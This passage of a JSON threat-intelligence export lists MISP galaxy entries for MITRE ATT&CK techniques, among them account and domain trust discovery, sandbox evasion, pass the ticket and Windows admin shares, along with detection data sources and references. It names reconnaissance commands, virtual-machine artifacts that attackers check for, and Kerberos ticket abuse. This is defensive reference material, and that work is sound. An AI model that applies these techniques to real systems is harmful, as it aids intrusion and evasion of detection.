parameters"],"mitre_platforms":["Windows","Linux","macOS"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1003","https:\/\/capec.mitre.org\/data\/definitions\/567.html","https:\/\/github.com\/Neohapsis\/creddump7","https:\/\/en.wikipedia.org\/wiki\/Active_Directory","https:\/\/msdn.microsoft.com\/library\/cc422924.aspx","http:\/\/blogs.technet.com\/b\/srd\/archive\/2014\/05\/13\/ms14-025-an-update-for-group-policy-preferences.aspx","https:\/\/obscuresecurity.blogspot.co.uk\/2012\/05\/gpp-password-retrieval-with-powershell.html","https:\/\/blogs.technet.microsoft.com\/askpfeplat\/2016\/04\/18\/the-importance-of-kb2871997-and-kb2928120-for-credential-protection\/","https:\/\/docs.microsoft.com\/en-us\/previous-versions\/windows\/it-pro\/windows-vista\/cc749211(v=ws.10)","https:\/\/msdn.microsoft.com\/library\/cc228086.aspx","https:\/\/msdn.microsoft.com\/library\/dd207691.aspx","https:\/\/wiki.samba.org\/index.php\/DRSUAPI","https:\/\/source.winehq.org\/WineAPI\/samlib.html","https:\/\/adsecurity.org\/?p=1729","http:\/\/www.harmj0y.net\/blog\/redteaming\/mimikatz-and-dcsync-and-extrasids-oh-my\/","https:\/\/blog.stealthbits.com\/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM","https:\/\/github.com\/gentilkiwi\/mimikatz\/wiki\/module-~-lsadump","https:\/\/msdn.microsoft.com\/library\/cc237008.aspx","https:\/\/github.com\/mattifestation\/PowerSploit","https:\/\/msdn.microsoft.com\/library\/cc245496.aspx"]},"local":false},{"id":"1077","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Domain Trust Discovery - T1482","tag_name":"misp-galaxy:mitre-attack-pattern=\"Domain Trust Discovery - T1482\"","description":"Adversaries may attempt to gather information on domain trust relationships that may be used to identify [Lateral Movement](https:\/\/attack.mitre.org\/tactics\/TA0008) opportunities in Windows multi-domain\/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https:\/\/attack.mitre.org\/techniques\/T1178), [Pass the Ticket](https:\/\/attack.mitre.org\/techniques\/T1097), and [Kerberoasting](https:\/\/attack.mitre.org\/techniques\/T1208).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https:\/\/attack.mitre.org\/software\/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"767dbf9e-df3f-45cb-8998-4903ab5f80c0","tag_id":"774","meta":{"external_id":["T1482"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["PowerShell logs","API monitoring","Process command-line parameters","Process monitoring"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1482","https:\/\/docs.microsoft.com\/en-us\/previous-versions\/windows\/it-pro\/windows-server-2003\/cc759554(v=ws.10)","https:\/\/adsecurity.org\/?p=1588","http:\/\/www.harmj0y.net\/blog\/redteaming\/a-guide-to-attacking-domain-trusts\/ ","https:\/\/www.microsoft.com\/security\/blog\/2017\/05\/04\/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack\/","https:\/\/docs.microsoft.com\/en-us\/dotnet\/api\/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships"]},"local":false},{"id":"1178","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Account Discovery - T1087","tag_name":"misp-galaxy:mitre-attack-pattern=\"Account Discovery - T1087\"","description":"Adversaries may attempt to get a listing of local system or domain accounts. \n\n### Windows\n\nExample commands that can acquire this information are net user<\/code>, net group <\/code>, and net localgroup <\/code> using the [Net](https:\/\/attack.mitre.org\/software\/S0039) utility or through use of [dsquery](https:\/\/attack.mitre.org\/software\/S0105). If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [System Owner\/User Discovery](https:\/\/attack.mitre.org\/techniques\/T1033) may apply.\n\n### Mac\n\nOn Mac, groups can be enumerated through the groups<\/code> and id<\/code> commands. In mac specifically, dscl . list \/Groups<\/code> and dscacheutil -q group<\/code> can also be used to enumerate groups and users.\n\n### Linux\n\nOn Linux, local users can be enumerated through the use of the \/etc\/passwd<\/code> file which is world readable. In mac, this same file is only used in single-user mode in addition to the \/etc\/master.passwd<\/code> file.\n\nAlso, groups can be enumerated through the groups<\/code> and id<\/code> commands.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"72b74d71-8169-42aa-92e0-e7b04b9f5a08","tag_id":"735","meta":{"external_id":["CAPEC-575"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["API monitoring","Process monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1087","https:\/\/capec.mitre.org\/data\/definitions\/575.html"]},"local":false},{"id":"1013","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Network Service Scanning - T1046","tag_name":"misp-galaxy:mitre-attack-pattern=\"Network Service Scanning - T1046\"","description":"Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"e3a12395-188d-4051-9a16-ea8e14d07b88","tag_id":"775","meta":{"external_id":["T1046"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["Netflow\/Enclave netflow","Network protocol analysis","Packet capture","Process command-line parameters","Process use of network"],"mitre_platforms":["Linux","Windows","macOS"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1046"]},"local":false},{"id":"1038","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Network Share Discovery - T1135","tag_name":"misp-galaxy:mitre-attack-pattern=\"Network Share Discovery - T1135\"","description":"Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\n### Windows\n\nFile sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder)\n\n[Net](https:\/\/attack.mitre.org\/software\/S0039) can be used to query a remote system for available shared drives using the net view \\\\remotesystem<\/code> command. It can also be used to query shared drives on the local system using net share<\/code>.\n\nAdversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.\n\n### Mac\n\nOn Mac, locally mounted shares can be viewed with the df -aH<\/code> command.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"3489cfc5-640f-4bb3-a103-9137b97de79f","tag_id":"776","meta":{"external_id":["T1135"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["Process monitoring","Process command-line parameters","Network protocol analysis","Process use of network"],"mitre_platforms":["macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1135","https:\/\/en.wikipedia.org\/wiki\/Shared_resource","https:\/\/technet.microsoft.com\/library\/cc770880.aspx"]},"local":false},{"id":"990","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Password Policy Discovery - T1201","tag_name":"misp-galaxy:mitre-attack-pattern=\"Password Policy Discovery - T1201\"","description":"Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https:\/\/attack.mitre.org\/techniques\/T1110). An adversary may attempt to access detailed information about the password policy used within an enterprise network. This would help the adversary to create a list of common passwords and launch dictionary and\/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\n\nPassword policies can be set and discovered on Windows, Linux, and macOS systems. (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)\n\n### Windows\n* net accounts<\/code>\n* net accounts \/domain<\/code>\n\n### Linux\n* chage -l <\/code>\n* cat \/etc\/pam.d\/common-password<\/code>\n\n### macOS\n* pwpolicy getaccountpolicies<\/code>","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"b6075259-dba3-44e9-87c7-e954f37ec0d5","tag_id":"777","meta":{"external_id":["T1201"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["Process command-line parameters","Process monitoring"],"mitre_platforms":["Windows","Linux","macOS"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1201","https:\/\/superuser.com\/questions\/150675\/how-to-display-password-policy-information-for-a-user-ubuntu","https:\/\/www.jamf.com\/jamf-nation\/discussions\/18574\/user-password-policies-on-non-ad-machines"]},"local":false},{"id":"905","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"File and Directory Discovery - T1083","tag_name":"misp-galaxy:mitre-attack-pattern=\"File and Directory Discovery - T1083\"","description":"Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. \n\n### Windows\n\nExample utilities used to obtain this information are dir<\/code> and tree<\/code>. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows API.\n\n### Mac and Linux\n\nIn Mac and Linux, this kind of discovery is accomplished with the ls<\/code>, find<\/code>, and locate<\/code> commands.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"7bc57495-ea59-4380-be31-a64af124ef18","tag_id":"778","meta":{"external_id":["T1083"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["File monitoring","Process monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1083","http:\/\/blog.jpcert.or.jp\/2016\/01\/windows-commands-abused-by-attackers.html"]},"local":false},{"id":"1177","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Process Discovery - T1057","tag_name":"misp-galaxy:mitre-attack-pattern=\"Process Discovery - T1057\"","description":"Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.\n\n### Windows\n\nAn example command that would obtain details on processes is \"tasklist\" using the [Tasklist](https:\/\/attack.mitre.org\/software\/S0057) utility.\n\n### Mac and Linux\n\nIn Mac and Linux, this is accomplished with the ps<\/code> command.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"8f4a33ec-8b1f-4b80-a2f6-642b2e479580","tag_id":"779","meta":{"external_id":["CAPEC-573"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["Process monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1057","https:\/\/capec.mitre.org\/data\/definitions\/573.html"]},"local":false},{"id":"1020","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Permission Groups Discovery - T1069","tag_name":"misp-galaxy:mitre-attack-pattern=\"Permission Groups Discovery - T1069\"","description":"Adversaries may attempt to find local system or domain-level groups and permissions settings. \n\n### Windows\n\nExamples of commands that can list groups are net group \/domain<\/code> and net localgroup<\/code> using the [Net](https:\/\/attack.mitre.org\/software\/S0039) utility.\n\n### Mac\n\nOn Mac, this same thing can be accomplished with the dscacheutil -q group<\/code> for the domain, or dscl . -list \/Groups<\/code> for local groups.\n\n### Linux\n\nOn Linux, local groups can be enumerated with the groups<\/code> command and domain groups via the ldapsearch<\/code> command.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"15dbf668-795c-41e6-8219-f0447c0e64ce","tag_id":"780","meta":{"external_id":["CAPEC-576"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["API monitoring","Process monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1069","https:\/\/capec.mitre.org\/data\/definitions\/576.html"]},"local":false},{"id":"1005","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"System Information Discovery - T1082","tag_name":"misp-galaxy:mitre-attack-pattern=\"System Information Discovery - T1082\"","description":"An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.\n\n### Windows\n\nExample commands and utilities that obtain this information include ver<\/code>, [Systeminfo](https:\/\/attack.mitre.org\/software\/S0096), and dir<\/code> within [cmd](https:\/\/attack.mitre.org\/software\/S0106) for identifying information based on present files and directories.\n\n### Mac\n\nOn Mac, the systemsetup<\/code> command gives a detailed breakdown of the system, but it requires administrative privileges. Additionally, the system_profiler<\/code> gives a very detailed breakdown of configurations, firewall rules, mounted volumes, hardware, and many other things without needing elevated permissions.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"354a7f88-63fb-41b5-a801-ce3b377b36f1","tag_id":"781","meta":{"external_id":["CAPEC-311"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["Process monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1082","https:\/\/capec.mitre.org\/data\/definitions\/311.html"]},"local":false},{"id":"1009","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Security Software Discovery - T1063","tag_name":"misp-galaxy:mitre-attack-pattern=\"Security Software Discovery - T1063\"","description":"Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. These checks may be built into early-stage remote access tools.\n\n### Windows\n\nExample commands that can be used to obtain security software information are [netsh](https:\/\/attack.mitre.org\/software\/S0108), reg query<\/code> with [Reg](https:\/\/attack.mitre.org\/software\/S0075), dir<\/code> with [cmd](https:\/\/attack.mitre.org\/software\/S0106), and [Tasklist](https:\/\/attack.mitre.org\/software\/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.\n\n### Mac\n\nIt's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"241814ae-de3f-4656-b49e-f9a80764d4b7","tag_id":"782","meta":{"external_id":["T1063"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["File monitoring","Process monitoring","Process command-line parameters"],"mitre_platforms":["macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1063"]},"local":false},{"id":"986","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"System Service Discovery - T1007","tag_name":"misp-galaxy:mitre-attack-pattern=\"System Service Discovery - T1007\"","description":"Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are \"sc,\" \"tasklist \/svc\" using [Tasklist](https:\/\/attack.mitre.org\/software\/S0057), and \"net start\" using [Net](https:\/\/attack.mitre.org\/software\/S0039), but adversaries may also use other tools as well.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"322bad5a-1c49-4d23-ab79-76d641794afa","tag_id":"783","meta":{"external_id":["CAPEC-574"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["Process monitoring","Process command-line parameters"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1007","https:\/\/capec.mitre.org\/data\/definitions\/574.html"]},"local":false},{"id":"1124","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Virtualization\/Sandbox Evasion - T1497","tag_name":"misp-galaxy:mitre-attack-pattern=\"Virtualization\/Sandbox Evasion - T1497\"","description":"Adversaries may check for the presence of a virtual machine environment (VME) or sandbox to avoid potential detection of tools and activities. If the adversary detects a VME, they may alter their malware to conceal the core functions of the implant or disengage from the victim. They may also search for VME artifacts before dropping secondary or additional payloads. \n\nAdversaries may use several methods including [Security Software Discovery](https:\/\/attack.mitre.org\/techniques\/T1063) to accomplish [Virtualization\/Sandbox Evasion](https:\/\/attack.mitre.org\/techniques\/T1497) by searching for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) to help determine if it is an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandboxes. (Citation: Unit 42 Pirpi July 2015)\n\n###Virtual Machine Environment Artifacts Discovery###\n\nAdversaries may use utilities such as [Windows Management Instrumentation](https:\/\/attack.mitre.org\/techniques\/T1047), [PowerShell](https:\/\/attack.mitre.org\/techniques\/T1086), [Systeminfo](https:\/\/attack.mitre.org\/software\/S0096), and the [Query Registry](https:\/\/attack.mitre.org\/techniques\/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, and\/or the Registry. Adversaries may use [Scripting](https:\/\/attack.mitre.org\/techniques\/T1064) to combine these checks into one script and then have the program exit if it determines the system to be a virtual environment. Also, in applications like VMWare, adversaries can use a special I\/O port to send commands and receive output. Adversaries may also check the drive size. For example, this can be done using the Win32 DeviceIOControl function. \n\nExample VME Artifacts in the Registry(Citation: McAfee Virtual Jan 2017)\n\n* HKLM\\SOFTWARE\\Oracle\\VirtualBox Guest Additions<\/code>\n* HKLM\\HARDWARE\\Description\\System\\\u201dSystemBiosVersion\u201d;\u201dVMWARE\u201d<\/code>\n* HKLM\\HARDWARE\\ACPI\\DSDT\\BOX_<\/code>\n\nExample VME files and DLLs on the system(Citation: McAfee Virtual Jan 2017)\n\n* WINDOWS\\system32\\drivers\\vmmouse.sys<\/code> \n* WINDOWS\\system32\\vboxhook.dll<\/code>\n* Windows\\system32\\vboxdisp.dll<\/code>\n\nCommon checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer\/product fields for strings relating to virtual machine applications, and VME-specific hardware\/processor instructions.(Citation: McAfee Virtual Jan 2017)\n\n###User Activity Discovery###\n\nAdversaries may search for user activity on the host (e.g., browser history, cache, bookmarks, number of files in the home directories, etc.) for reassurance of an authentic environment. They might detect this type of information via user interaction and digital signatures. They may have malware check the speed and frequency of mouse clicks to determine if it\u2019s a sandboxed environment.(Citation: Sans Virtual Jan 2016) Other methods may rely on specific user interaction with the system before the malicious code is activated. Examples include waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) and waiting for a user to double click on an embedded image to activate (Citation: FireEye FIN7 April 2017).\n\n###Virtual Hardware Fingerprinting Discovery###\n\nAdversaries may check the fan and temperature of the system to gather evidence that can be indicative a virtual environment. An adversary may perform a CPU check using a WMI query $q = \u201cSelect * from Win32_Fan\u201d Get-WmiObject -Query $q<\/code>. If the results of the WMI query return more than zero elements, this might tell them that the machine is a physical one. (Citation: Unit 42 OilRig Sept 2018)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"82caa33e-d11a-433a-94ea-9b5a5fbef81d","tag_id":"784","meta":{"external_id":["T1497"],"kill_chain":["mitre-attack:defense-evasion","mitre-attack:discovery"],"mitre_data_sources":["Process monitoring","Process command-line parameters"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1497","https:\/\/unit42.paloaltonetworks.com\/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload\/","https:\/\/securingtomorrow.mcafee.com\/other-blogs\/mcafee-labs\/stopping-malware-fake-virtual-machine\/","https:\/\/www.sans.org\/reading-room\/whitepapers\/forensics\/detecting-malware-sandbox-evasion-techniques-36667","https:\/\/unit42.paloaltonetworks.com\/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan\/","https:\/\/www.fireeye.com\/blog\/threat-research\/2017\/04\/fin7-phishing-lnk.html","https:\/\/researchcenter.paloaltonetworks.com\/2018\/09\/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie\/"]},"local":false},{"id":"1167","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Logon Scripts - T1037","tag_name":"misp-galaxy:mitre-attack-pattern=\"Logon Scripts - T1037\"","description":"### Windows\n\nWindows allows logon scripts to be run whenever a specific user or group of users log into a system. (Citation: TechNet Logon Scripts) The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server.\n\nIf adversaries can access these scripts, they may insert additional code into the logon script to execute their tools when a user logs in. This code can allow them to maintain persistence on a single system, if it is a local script, or to move laterally within a network, if the script is stored on a central server and pushed to many systems. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.\n\n### Mac\n\nMac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root (Citation: creating login hook). There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"03259939-0b57-482f-8eb5-87c0e0d54334","tag_id":"785","meta":{"external_id":["CAPEC-564"],"kill_chain":["mitre-attack:lateral-movement","mitre-attack:persistence"],"mitre_data_sources":["File monitoring","Process monitoring"],"mitre_platforms":["macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1037","https:\/\/capec.mitre.org\/data\/definitions\/564.html","https:\/\/technet.microsoft.com\/en-us\/library\/cc758918(v=ws.10).aspx","https:\/\/support.apple.com\/de-at\/HT2420"]},"local":false},{"id":"1022","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Pass the Ticket - T1097","tag_name":"misp-galaxy:mitre-attack-pattern=\"Pass the Ticket - T1097\"","description":"Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\n\nIn this technique, valid Kerberos tickets for [Valid Accounts](https:\/\/attack.mitre.org\/techniques\/T1078) are captured by [Credential Dumping](https:\/\/attack.mitre.org\/techniques\/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access. (Citation: ADSecurity AD Kerberos Attacks) (Citation: GentilKiwi Pass the Ticket)\n\nSilver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). (Citation: ADSecurity AD Kerberos Attacks)\n\nGolden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory. (Citation: Campbell 2014)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"a257ed11-ff3b-4216-8c9d-3938ef57064c","tag_id":"786","meta":{"external_id":["T1097"],"kill_chain":["mitre-attack:lateral-movement"],"mitre_data_sources":["Authentication logs"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1097","http:\/\/defcon.org\/images\/defcon-22\/dc-22-presentations\/Campbell\/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf","https:\/\/adsecurity.org\/?p=556","http:\/\/blog.gentilkiwi.com\/securite\/mimikatz\/pass-the-ticket-kerberos","https:\/\/cert.europa.eu\/static\/WhitePapers\/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf"]},"local":false},{"id":"1021","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Windows Admin Shares - T1077","tag_name":"misp-galaxy:mitre-attack-pattern=\"Windows Admin Shares - T1077\"","description":"Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$<\/code>, ADMIN$<\/code>, and IPC$<\/code>. \n\nAdversaries may use this technique in conjunction with administrator-level [Valid Accounts](https:\/\/attack.mitre.org\/techniques\/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB\/RPC are [Scheduled Task](https:\/\/attack.mitre.org\/techniques\/T1053), [Service Execution](https:\/\/attack.mitre.org\/techniques\/T1035), and [Windows Management Instrumentation](https:\/\/attack.mitre.org\/techniques\/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https:\/\/attack.mitre.org\/techniques\/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares)\n\nThe [Net](https:\/\/attack.mitre.org\/software\/S0039) utility can be used to connect to Windows admin shares on remote systems using net use<\/code> commands with valid credentials. (Citation: Technet Net Use)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"ffe742ed-9100-4686-9e00-c331da544787","tag_id":"787","meta":{"external_id":["CAPEC-561"],"kill_chain":["mitre-attack:lateral-movement"],"mitre_data_sources":["Process use of network","Authentication logs","Process monitoring","Process command-line parameters"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1077","https:\/\/capec.mitre.org\/data\/definitions\/561.html","http:\/\/support.microsoft.com\/kb\/314984","http:\/\/blogs.technet.com\/b\/jepayne\/archive\/2015\/11\/27\/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts.aspx","http:\/\/blogs.technet.com\/b\/jepayne\/archive\/2015\/11\/24\/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem.aspx","https:\/\/en.wikipedia.org\/wiki\/Server_Message_Block","https:\/\/technet.microsoft.com\/en-us\/library\/cc787851.aspx","https:\/\/technet.microsoft.com\/bb490717.aspx"]},"local":false},{"id":"1006","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Windows Remote Management - T1028","tag_name":"misp-galaxy:mitre-attack-pattern=\"Windows Remote Management - T1028\"","description":"Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the winrm<\/code> command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"c3bce4f4-9795-46c6-976e-8676300bbc39","tag_id":"788","meta":{"external_id":["T1028"],"kill_chain":["mitre-attack:execution","mitre-attack:lateral-movement"],"mitre_data_sources":["File monitoring","Authentication logs","Netflow\/Enclave netflow","Process monitoring","Process command-line parameters"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1028","http:\/\/msdn.microsoft.com\/en-us\/library\/aa384426","https:\/\/www.slideshare.net\/kieranjacobsen\/lateral-movement-with-power-shell-2"]},"local":false},{"id":"1191","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Automated Collection - T1119","tag_name":"misp-galaxy:mitre-attack-pattern=\"Automated Collection - T1119\"","description":"Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of [Scripting](https:\/\/attack.mitre.org\/techniques\/T1064) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https:\/\/attack.mitre.org\/techniques\/T1083) and [Remote File Copy](https:\/\/attack.mitre.org\/techniques\/T1105) to identify and move files.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"30208d3e-0d6b-43c8-883e-44462a514619","tag_id":"789","meta":{"external_id":["T1119"],"kill_chain":["mitre-attack:collection"],"mitre_data_sources":["File monitoring","Data loss prevention","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1119"]},"local":false},{"id":"1173","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Data Staged - T1074","tag_name":"misp-galaxy:mitre-attack-pattern=\"Data Staged - T1074\"","description":"Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Data Compressed](https:\/\/attack.mitre.org\/techniques\/T1002) or [Data Encrypted](https:\/\/attack.mitre.org\/techniques\/T1022).\n\nInteractive command shells may be used, and common functionality within [cmd](https:\/\/attack.mitre.org\/software\/S0106) and bash may be used to copy data into a staging location.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"7dd95ff6-712e-4056-9626-312ea4ab4c5e","tag_id":"737","meta":{"external_id":["T1074"],"kill_chain":["mitre-attack:collection"],"mitre_data_sources":["File monitoring","Process monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1074"]},"local":false},{"id":"890","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Data from Local System - 